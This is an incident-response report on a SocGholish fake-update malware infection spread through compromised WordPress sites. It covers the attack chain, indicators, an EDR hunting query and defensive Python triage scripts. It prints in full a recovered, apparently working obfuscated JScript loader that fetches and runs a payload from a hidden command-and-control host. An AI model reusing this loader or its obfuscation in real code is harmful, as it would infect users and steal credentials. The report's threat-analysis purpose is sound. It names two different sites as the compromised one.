SocGholish
SocGholish is a well-known malware campaign that masquerades as software updates, typically for browsers, to trick users into downloading malicious files. It commonly distributes these lures through compromised websites; WordPress sites are particularly exposed when default configurations are left unchanged. On February 27th, 2024, an EDR alert led to the discovery of SocGholish malware on a state device. The EDR solution worked as intended and blocked the process from running. Further analysis found that a local Minnesota website had been compromised and was serving the malware. A search found that, in total, 12 distinct devices had visited the compromised website in the past 30 days (02/07/2024-03/07/2024). No evidence suggests that any state device was compromised.
Attack Chain
- The user visits a compromised website (ecowaterminnesota[.]com).
- An embedded script covers the screen and executes a linked malicious script.
- The malicious script contains the SocGholish payload.
- A fake update page is loaded over the screen, prompting the user to download a software update.
- The downloaded file is a JavaScript file, often named “update”, “version”, or some other software-update-related name.
- The user executes the “update” file, and the malware connects to a Command and Control (C2) server.
- Data is exfiltrated and in some cases, lateral movement or secondary payloads may be executed.
Manual Incident Review and Attribution
On February 27th, 2024, the Enterprise Security Operations Center (SOC) was notified of a high-severity alert pertaining to a file named “Update.js”. The file attempted to execute via wscript, and the Endpoint Detection and Response (EDR) solution successfully blocked the process. Further analysis determined that the file contained malicious JavaScript utilizing Base64-encoded strings and bytecode. Detonation in enterprise sandbox environments showed that it used process injection to execute a payload designed to replace and harvest registry keys, collect mailbox-related information, and establish communications with a Command and Control (C2) server. Correlating browsing and download events in the EDR showed that the user downloaded the file after visiting the compromised website hxxps[://]ecowaterminnesota[.]com/. Investigation of this website led to the discovery of embedded JavaScript content linking to several malicious domains.
| URL | Content | Embed |
|---|---|---|
| hxxps[://]ecowaterminnesota[.]com/wp-content/cache/min/1/9659650c81ce1b984c58[.]js?ver=1709046791 | Self-link to a hosted JavaScript file. Contains a function that loads a specified JavaScript source file and returns the element. | Embedded in a viewport element that covers the current screen. |
| hxxps[://]pluralism[.]themancav[.]com/lbK9kO6Q3vnxkIeio4aRsueQh7L82d/o+dXbsug= | The malicious payload, linked to SocGholish via address resolution in Open-Source Intelligence (OSINT) tools. | Embedded in the above script. This script loads the malicious software update page. |
Analysis
The fraudblocker domain loaded a script file that used region detection and ad-block detection to decide which malicious websites and advertisements to serve. Most of the domains contained within the linked script file were blocked by the Secure Internet Gateway (SIG) tool. A block list was created for manual entry and rule creation. The script served these URLs as Base64-encoded strings, decoded and assembled at run time [Figure 1 and Figure 2]. The complete script is attached to this report.
The self-linked JavaScript file contained a single function used to import the malicious payload script [Figure 3]. This function loads the payload script into the passed viewport element. The viewport, or rendered page, is then overridden to display the malicious software update screen [Figure 5].
The malicious software update screen downloads a JavaScript file that contains Base64-encoded strings and bytecode/shellcode. This script steals mail credentials, enumerates registry keys, and establishes communications with a C2 server. The script sends encrypted traffic to the C2 server at wxadl[.]collection[.]aixpirts[.]com [Figure 4].
Remediation
In all identified incidents, the EDR solution successfully blocked the execution of the script. As such, remediation efforts focused on removal of the malware file and the creation of extended block lists for involved domains. Identified malicious domains were blocked in the SIG tool. All blocked domains are included in the listed IOCs. Malicious scripts have been attached with this report. These scripts have not been defanged and are provided as found. Take caution when performing further analysis.
Detection and Removal
When an incident involves a suspicious Update.js file, the presence of SocGholish can be confirmed by recovering the downloaded file. SocGholish payloads typically (as of 11/2024) look something like this:
/*@cc_on
function a0_0x6c2f(){var _0x4d0653=['udu4rgu','zvrkBtu','ys5VCMC','AhnPzgu','y3rPB24','mtvvshDSCwq','nty0ntjUtw51Cwe','CMvZCg8','sgvHzgu','ue9tva','mJeZnZmYsfHTtw9s','zhrRqwu','qwn0Axy','B3bLBG','zxj2Awm','tvnytuW','u3rHDgu','ntiYmtKWEMjRyvzx','zxzHBa','A2vLCc0','u2XLzxa','zvHpyMO','ywXPDMu','zc9Jz1m','mteYmtmYnxjdrKfRCq','y2H1CMm','v1ni','CMLZDgW','mI5ytuW','lNnVDxq','mtnKvw5SqK4','AgfUDfm','ndLcEhPKsNi','nde4mJjYwwfQA20','otLNzNnyuhu','q29UBMu','q0Dgrdm','mJi4nJC4nMDdrxvkuG','BM12qwS','CxvLC3q','BNnL','mtm0nfHhwMTHEq','vgv4Da','sfruua','mtiYnJa4whHlsfzx','zwn0','C2vUza','mtzlwJG','Ag9My2G','C1e9pq','wur3u1y','l21LCMm','oI8VzNK','CMvHzhK','Ahr0Chm','C3nVBNm','C2v0uMu','DMqUBgu'];a0_0x6c2f=function(){return _0x4d0653;};return a0_0x6c2f();}(function(_0x36c4be,_0x3f1982){var a0_0x580e76={_0x519d24:0x410,_0x5d3199:0x404,_0x316d48:0x3d9,_0x1515f1:0x3cd,_0x25f7eb:0x3d2,_0x4ae9c5:0x3eb,_0x1f20e7:0x3e2,_0x11d2f7:0x3f0,_0x301625:0x3ed,_0x2fa1f3:0x3fe,_0x1bd980:0x3e0,_0x9ebab5:0x3d1,_0x243f1b:0x3bf,_0x52fbf3:0x3cc,_0x1948f9:0x3c4,_0x328397:0x3d8,_0x2677a3:0x3ce,_0x3608ec:0x3f7,_0x341588:0x3ec,_0x435d16:0x3d5},a0_0x4eb24c={_0x3cc6e1:0x27e};function _0x373699(_0x15132a,_0x128e6a){return a0_0x9fb4(_0x128e6a-a0_0x4eb24c._0x3cc6e1,_0x15132a);}var _0x2cc6bb=_0x36c4be();while(!![]){try{var 
_0x9134d5=parseInt(_0x373699(a0_0x580e76._0x519d24,a0_0x580e76._0x5d3199))/0x1*(-parseInt(_0x373699(a0_0x580e76._0x316d48,a0_0x580e76._0x1515f1))/0x2)+parseInt(_0x373699(a0_0x580e76._0x25f7eb,a0_0x580e76._0x4ae9c5))/0x3*(parseInt(_0x373699(a0_0x580e76._0x1f20e7,a0_0x580e76._0x11d2f7))/0x4)+parseInt(_0x373699(a0_0x580e76._0x301625,a0_0x580e76._0x2fa1f3))/0x5+parseInt(_0x373699(a0_0x580e76._0x1bd980,a0_0x580e76._0x9ebab5))/0x6+parseInt(_0x373699(a0_0x580e76._0x243f1b,a0_0x580e76._0x52fbf3))/0x7*(-parseInt(_0x373699(a0_0x580e76._0x1948f9,a0_0x580e76._0x328397))/0x8)+parseInt(_0x373699(a0_0x580e76._0x1f20e7,a0_0x580e76._0x2677a3))/0x9*(parseInt(_0x373699(a0_0x580e76._0x1f20e7,a0_0x580e76._0x3608ec))/0xa)+-parseInt(_0x373699(a0_0x580e76._0x4ae9c5,a0_0x580e76._0x341588))/0xb*(parseInt(_0x373699(a0_0x580e76._0x341588,a0_0x580e76._0x435d16))/0xc);if(_0x9134d5===_0x3f1982)break;else _0x2cc6bb['push'](_0x2cc6bb['shift']());}catch(_0x1624ea){_0x2cc6bb['push'](_0x2cc6bb['shift']());}}}(a0_0x6c2f,0x78605));function a0_0x9fb4(_0x1501e6,_0x5c0323){var _0x6c2f40=a0_0x6c2f();return a0_0x9fb4=function(_0x9fb449,_0x3914b4){_0x9fb449=_0x9fb449-0x14d;var _0x25819d=_0x6c2f40[_0x9fb449];if(a0_0x9fb4['chYAjT']===undefined){var _0x321c5d=function(_0x5810ac){var _0x33578a='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x24cba7='',_0x438632='';for(var _0x2925af=0x0,_0x377ebd,_0x80662f,_0x2d8d1c=0x0;_0x80662f=_0x5810ac['charAt'](_0x2d8d1c++);~_0x80662f&&(_0x377ebd=_0x2925af%0x4?_0x377ebd*0x40+_0x80662f:_0x80662f,_0x2925af++%0x4)?_0x24cba7+=String['fromCharCode'](0xff&_0x377ebd>>(-0x2*_0x2925af&0x6)):0x0){_0x80662f=_0x33578a['indexOf'](_0x80662f);}for(var _0x29a7da=0x0,_0x228b7d=_0x24cba7['length'];_0x29a7da<_0x228b7d;_0x29a7da++){_0x438632+='%'+('00'+_0x24cba7['charCodeAt'](_0x29a7da)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x438632);};a0_0x9fb4['KmPpFx']=_0x321c5d,_0x1501e6=arguments,a0_0x9fb4['chYAjT']=!![];}var 
_0x565532=_0x6c2f40[0x0],_0x6bcc8d=_0x9fb449+_0x565532,_0x183405=_0x1501e6[_0x6bcc8d];return!_0x183405?(_0x25819d=a0_0x9fb4['KmPpFx'](_0x25819d),_0x1501e6[_0x6bcc8d]=_0x25819d):_0x25819d=_0x183405,_0x25819d;},a0_0x9fb4(_0x1501e6,_0x5c0323);}function a0_0x5810ac(_0x438632){var a0_0x3c5b31={_0xd4b56a:0x16b,_0xf0c6d1:0x170,_0x4e44d6:0x157,_0x5791ca:0x157,_0x3e75b3:0x171,_0xa57522:0x159},a0_0x18eee5={_0x4c4e4b:0x1},_0x2925af=_0x5a66b9(a0_0x3c5b31._0xd4b56a,a0_0x3c5b31._0xf0c6d1)+_0x5a66b9(a0_0x3c5b31._0x4e44d6,a0_0x3c5b31._0x5791ca),_0x377ebd=_0x2925af+_0x5a66b9(a0_0x3c5b31._0x3e75b3,a0_0x3c5b31._0xa57522);function _0x5a66b9(_0x147a50,_0x53fffd){return a0_0x9fb4(_0x53fffd-a0_0x18eee5._0x4c4e4b,_0x147a50);}var _0x80662f=_0x438632[_0x377ebd];return _0x80662f;};function a0_0x31636c(_0x3bdf37,_0x1a16e7){var a0_0x1447c1={_0x376164:0x2db};return a0_0x9fb4(_0x1a16e7-a0_0x1447c1._0x376164,_0x3bdf37);}function a0_0x33578a(_0x2d8d1c){return _0x2d8d1c;};var a0_0x24cba7=new this[(a0_0x31636c(0x458,0x44f))+(a0_0x31636c(0x44b,0x458))+(a0_0x31636c(0x441,0x436))](a0_0x31636c(0x449,0x452)+a0_0x31636c(0x472,0x45f)+a0_0x31636c(0x424,0x434));a0_0x24cba7[a0_0x31636c(0x465,0x450)](a0_0x31636c(0x438,0x44c),a0_0x31636c(0x42e,0x43f)+a0_0x31636c(0x435,0x43d)+a0_0x31636c(0x43e,0x442)+a0_0x31636c(0x44e,0x440)+a0_0x31636c(0x45a,0x460)+a0_0x31636c(0x449,0x446)+a0_0x31636c(0x456,0x45c)+a0_0x31636c(0x446,0x439)+a0_0x31636c(0x46d,0x45e)+a0_0x31636c(0x43e,0x445)+a0_0x31636c(0x42c,0x43c)+a0_0x31636c(0x41a,0x428)+a0_0x31636c(0x43c,0x451)+'es',!![]),a0_0x24cba7[a0_0x31636c(0x42d,0x441)+a0_0x31636c(0x445,0x430)+a0_0x31636c(0x440,0x44b)+'r'](a0_0x31636c(0x41f,0x42c)+a0_0x31636c(0x440,0x447),a0_0x31636c(0x443,0x456)+a0_0x31636c(0x45b,0x459)),a0_0x24cba7[a0_0x31636c(0x422,0x437)](a0_0x31636c(0x428,0x43b)+a0_0x31636c(0x450,0x44e)+a0_0x31636c(0x46b,0x45a)+a0_0x31636c(0x424,0x42d)+a0_0x31636c(0x43b,0x443)+a0_0x31636c(0x429,0x444)+a0_0x31636c(0x439,0x438)+a0_0x31636c(0x41c,0x42f)+a0_0x31636c(0x431,0x43a));while(!!
[]){this[a0_0x31636c(0x475,0x45d)][a0_0x31636c(0x43d,0x457)](0x3e8);if(a0_0x24cba7[a0_0x31636c(0x421,0x43e)+a0_0x31636c(0x455,0x453)]==0x4){this[a0_0x31636c(0x43a,0x455)](a0_0x33578a(a0_0x5810ac(a0_0x24cba7)));break;}}
@*/
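A recovered Update.js can be triaged statically before anyone touches the EDR's decoded-script view. The following Python script is an added example for this report, not the SOC's tooling: it scores a script body on traits visible in the sample above (the `/*@cc_on ... @*/` JScript conditional-compilation wrapper, the `while(!![])` loop that rotates the string array with `push(shift())` until a `parseInt(...)/0x..` checksum matches, the inline Base64 alphabet of the custom decoder, and `_0x` identifiers). The indicator weights and thresholds are my assumptions, and both embedded inputs are constructed: one mimics the sample's shape with the string table truncated and the decoder and network stage removed, the other is ordinary theme script. A high score is a reason to pull the decoded script from the EDR, not a verdict by itself.

```python
"""Static triage of a recovered SocGholish-style Update.js.

Added example for this report, not the SOC's tooling. Scores a script on
obfuscation traits visible in the sample above; weights and thresholds are
assumptions, and a high score is a reason to pull the EDR's decoded script
event, not a verdict on its own.
"""
import re

# (name, pattern, weight). Each pattern corresponds to something visible in the
# recovered sample: the JScript conditional-compilation wrapper that hides the
# code from non-Microsoft engines, the while(!![]) loop that rotates the string
# array with push(shift()) until a parseInt()/0x.. checksum matches, the inline
# Base64 alphabet used by the custom decoder, and _0x-style identifiers.
INDICATORS = [
    ("jscript_cc_on",     re.compile(r"/\*@cc_on"), 3),
    ("array_rotation",    re.compile(r"\['push'\]\(\w+\['shift'\]\(\)\)"), 3),
    ("parseint_checksum", re.compile(r"parseInt\([^;]*?\)\s*/\s*0x[0-9a-fA-F]+"), 2),
    ("base64_alphabet",   re.compile(r"abcdefghijklmnopqrstuvwxyz"
                                     r"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\+/="), 2),
    ("double_not_array",  re.compile(r"!!\[\]"), 1),
    ("hex_identifiers",   re.compile(r"_0x[0-9a-fA-F]{4,}"), 1),
]
# Many short quoted tokens (the encoded string table) is a separate indicator.
STRING_TABLE_MIN = 20
STRING_TOKEN = re.compile(r"'[A-Za-z0-9+/=]{3,20}'")


def score_js(text):
    """Return {'hits': [indicator names], 'score': int} for one script body."""
    hits, score = [], 0
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            hits.append(name)
            score += weight
    if len(STRING_TOKEN.findall(text)) >= STRING_TABLE_MIN:
        hits.append("encoded_string_table")
        score += 2
    return {"hits": hits, "score": score}


def verdict(score):
    """Thresholds are assumptions; tune against your own benign JS corpus."""
    if score >= 6:
        return "likely obfuscated loader: escalate and pull the decoded script from the EDR"
    if score >= 3:
        return "review: some obfuscation traits present"
    return "no loader traits found"


# Constructed sample mimicking the shape of the recovered file: string table
# truncated, decoder and network stage removed, so it is inert.
SUSPECT_JS = r"""/*@cc_on
function a0_0x6c2f(){var _0x4d0653=['udu4rgu','zvrkBtu','ys5VCMC','AhnPzgu'];a0_0x6c2f=function(){return _0x4d0653;};return a0_0x6c2f();}
(function(_0x36c4be,_0x3f1982){var _0x2cc6bb=_0x36c4be();while(!![]){try{var _0x9134d5=parseInt(_0x373699(0x410,0x404))/0x1+parseInt(_0x373699(0x3d2,0x3eb))/0x3;if(_0x9134d5===_0x3f1982)break;else _0x2cc6bb['push'](_0x2cc6bb['shift']());}catch(_0x1624ea){_0x2cc6bb['push'](_0x2cc6bb['shift']());}}}(a0_0x6c2f,0x78605));
var _0x33578a='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
@*/"""

# Constructed benign comparison: ordinary theme script.
BENIGN_JS = """document.addEventListener('DOMContentLoaded', function () {
  var links = document.querySelectorAll('.menu a');
  for (var i = 0; i < links.length; i++) { links[i].classList.add('ready'); }
});"""

if __name__ == "__main__":
    for label, body in (("suspect", SUSPECT_JS), ("benign", BENIGN_JS)):
        r = score_js(body)
        print(label, r["score"], r["hits"], "->", verdict(r["score"]))
```

Run it against the file recovered from the quarantine folder rather than against anything still on the user's desktop; the script only reads text and never evaluates it, which is the point of triaging statically first.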
To find the compromised site that started the chain, run the following DNS investigation query in the EDR (CrowdStrike Falcon LogScale syntax, judging by the `#event_simpleName` fields), substituting the affected host for `?ComputerName`:
ComputerName = ?ComputerName | #repo=base_sensor cid="*" | in(#event_simpleName, values=[DnsRequest, SuspiciousDnsRequest, *FileWritten]) | ContextBaseFileName = "chrome.exe" or ContextBaseFileName = "firefox.exe" or ContextBaseFileName = "msedge.exe" | Time := formatTime("%FT%TZ", field=timestamp, timezone= "America/Chicago") | table(["Time","#event_simpleName","ComputerName","Agent IP","LocalAddressIP4","DomainName", "ContextImageFileName", "FilePath","FileName","OriginalFilename","ContextProcessId"], limit=5000) | sort(Time, limit=5000)
This will show all DNS and file-write events for the given host's browser processes.
Work through the domains that appear just before the initial detection time to find the infected domain. In this case, it was northeastiowarcd[.]org.
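Working back through the domains by hand is fine for one host, but for the 12-device search described above it helps to script the pivot. The following Python is an added example for this report, not the SOC's tooling: it reads a CSV export shaped like the `table()` output of the query above (same column names), finds the Update.js write event, and lists the domains a browser process resolved in the minutes before it, most recent first and defanged for the report. The rows are constructed; the `ScriptFileWritten` event name on the write row and the `*.example.*` placeholder domains are assumptions, and northeastiowarcd.org is the infected site named in the text.

```python
"""Pivot from the Update.js write back to the browser's preceding DNS lookups.

Added example for this report, not the SOC's tooling. Reads a CSV export shaped
like the table() output of the query above and lists the domains a browser
resolved in the window before the file write, most recent first. Rows below
are constructed; the write event name and placeholder domains are assumptions.
"""
import csv
import io
from datetime import datetime, timedelta

TIME_FMT = "%Y-%m-%dT%H:%M:%SZ"   # matches formatTime("%FT%TZ", ...) in the query
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe"}

# Constructed export for one host. northeastiowarcd.org is the infected site
# named in the text; *.example.* names are RFC 2606 placeholders. The svchost
# row would be filtered out by the query itself and is here only to show the
# process filter also works on broader exports.
EXPORT_CSV = r"""Time,#event_simpleName,ComputerName,ContextImageFileName,DomainName,FileName
2024-03-04T14:01:10Z,DnsRequest,WS-0421,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,www.example.org,
2024-03-04T14:01:12Z,DnsRequest,WS-0421,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,cdn.example.net,
2024-03-04T14:03:40Z,DnsRequest,WS-0421,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,northeastiowarcd.org,
2024-03-04T14:03:41Z,DnsRequest,WS-0421,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,cdn.example.net,
2024-03-04T14:03:58Z,DnsRequest,WS-0421,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,files.example.com,
2024-03-04T14:04:02Z,DnsRequest,WS-0421,\Device\HarddiskVolume3\Windows\System32\svchost.exe,time.example.net,
2024-03-04T14:04:05Z,ScriptFileWritten,WS-0421,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,,Update.js
2024-03-04T14:05:00Z,DnsRequest,WS-0421,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,late.example.net,
"""


def load_events(text):
    """Parse the export; add a datetime and the process basename to each row."""
    events = list(csv.DictReader(io.StringIO(text)))
    for e in events:
        e["ts"] = datetime.strptime(e["Time"], TIME_FMT)
        e["process"] = e["ContextImageFileName"].rsplit("\\", 1)[-1].lower()
    return events


def detection_time(events, filename="Update.js"):
    """Earliest *FileWritten event for the downloaded loader, or None."""
    hits = [e["ts"] for e in events
            if e["#event_simpleName"].endswith("FileWritten")
            and e["FileName"].lower() == filename.lower()]
    return min(hits) if hits else None


def domains_before(events, t_detect, window=timedelta(minutes=10)):
    """Distinct domains a browser resolved in [t_detect - window, t_detect],
    most recent first, as (seconds_before, domain). The infected site is
    usually among the last few; the delivery domain is resolved right after it."""
    latest = {}
    for e in events:
        if not e["#event_simpleName"].endswith("DnsRequest"):  # also SuspiciousDnsRequest
            continue
        if e["process"] not in BROWSERS or not e["DomainName"]:
            continue
        if t_detect - window <= e["ts"] <= t_detect:
            d = e["DomainName"].lower()
            if d not in latest or e["ts"] > latest[d]:
                latest[d] = e["ts"]
    ordered = sorted(latest.items(), key=lambda kv: kv[1], reverse=True)
    return [((t_detect - ts).total_seconds(), d) for d, ts in ordered]


def defang(domain):
    """Report-safe form, matching the hxxps/[.] convention used above."""
    return domain.replace(".", "[.]")


if __name__ == "__main__":
    evs = load_events(EXPORT_CSV)
    t0 = detection_time(evs)
    print("Update.js written at", t0.strftime(TIME_FMT))
    for secs, d in domains_before(evs, t0):
        print(f"  -{secs:6.0f}s  {defang(d)}")
```

CDN and analytics hosts will sit between the infected site and the write, as in the constructed rows, so the first name in the list is not automatically the answer; the site visited a few lookups before the download, followed by a name you cannot explain, is the pattern to look for.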
Using a sandbox, visit the domain and inspect the page source. In the source, you should be able to identify an async script injection.
This is usually the source domain for the malware delivery system. Often, but not always, you will also be able to trigger the malware delivery system on the domain. Typically, it will match your browser and offer a “FakeUpdate”.
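Inspecting the page source by eye works, but a saved copy of the page can be checked mechanically for the two shapes of injection this report describes: a `<script src>` tag pulling from a host other than the site's own (often with `async`), and an inline script that builds a script element at run time, which is how the self-linked file in the table above pulled the payload. The following Python is an added example for this report, not the SOC's tooling. The HTML is constructed and its hosts are placeholders; the site's own host name is passed in by the analyst.

```python
"""Spot injected script loaders in saved page source.

Added example for this report, not the SOC's tooling. Parses a saved HTML copy
of the suspect site and reports external <script src> tags (flagging async
ones) and inline scripts that create a script element at run time. The page
below is constructed; its host names are placeholders.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect every <script> with its src, async flag and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            a = dict(attrs)  # a bare `async` attribute appears as ('async', None)
            self._current = {"src": a.get("src"), "async": "async" in a, "text": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["text"] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


DYNAMIC_LOADER = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)")
FIRST_URL_HOST = re.compile(r"https?://([^/'\"\s]+)")


def same_site(host, site_host):
    return host == site_host or host.endswith("." + site_host)


def find_injections(html_text, site_host):
    """Return findings as {'kind', 'host', 'detail'} dicts, in page order."""
    p = ScriptCollector()
    p.feed(html_text)
    p.close()
    site_host = site_host.lower()
    findings = []
    for s in p.scripts:
        if s["src"]:
            host = urlparse(s["src"]).hostname  # None for relative paths; handles // too
            if host and not same_site(host.lower(), site_host):
                kind = "external_async_script" if s["async"] else "external_script"
                findings.append({"kind": kind, "host": host.lower(), "detail": s["src"]})
        elif DYNAMIC_LOADER.search(s["text"]) and ".src" in s["text"]:
            m = FIRST_URL_HOST.search(s["text"])
            findings.append({"kind": "inline_dynamic_loader",
                             "host": m.group(1).lower() if m else None,
                             "detail": s["text"].strip()[:80]})
    return findings


# Constructed saved page: two legitimate scripts (one relative, one on a
# subdomain of the site), one injected async external tag, one inline loader.
SAVED_PAGE = """<!doctype html>
<html><head><title>Constructed WordPress page</title>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://static.example-site.org/wp-content/themes/site/main.js"></script>
<script async src="https://cdn-assets.example.net/lbK9kO6Q/loader.js"></script>
</head><body>
<p>Welcome.</p>
<script>
var s = document.createElement('script');
s.src = 'https://updates.example.com/stage2.js'; s.async = true;
document.head.appendChild(s);
</script>
</body></html>"""

if __name__ == "__main__":
    for f in find_injections(SAVED_PAGE, "example-site.org"):
        print(f["kind"], f["host"], "|", f["detail"])
```

An external host is not proof of compromise on its own (legitimate sites load third-party scripts too), so check each flagged host against the SIG block list and OSINT, and remember the table above shows the injection sitting inside a minified `wp-content/cache` bundle, so save and scan those bundles as well as the HTML.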
In the console, look for a ScriptControlBlocked event in the process chain for the detection. This event contains the cleartext (decoded) script that the payload attempted to execute.
You can access this event by clicking the Investigate Event menu item in the detection.
In this script is the C2 domain the malware pushes data to.
After identifying the infected domain and the malware delivery domain, block all associated domains in Umbrella. If the infected domain has listed contact information, consider sending the owner a notification that their site is infected with SocGholish. I find that most domain owners are appreciative.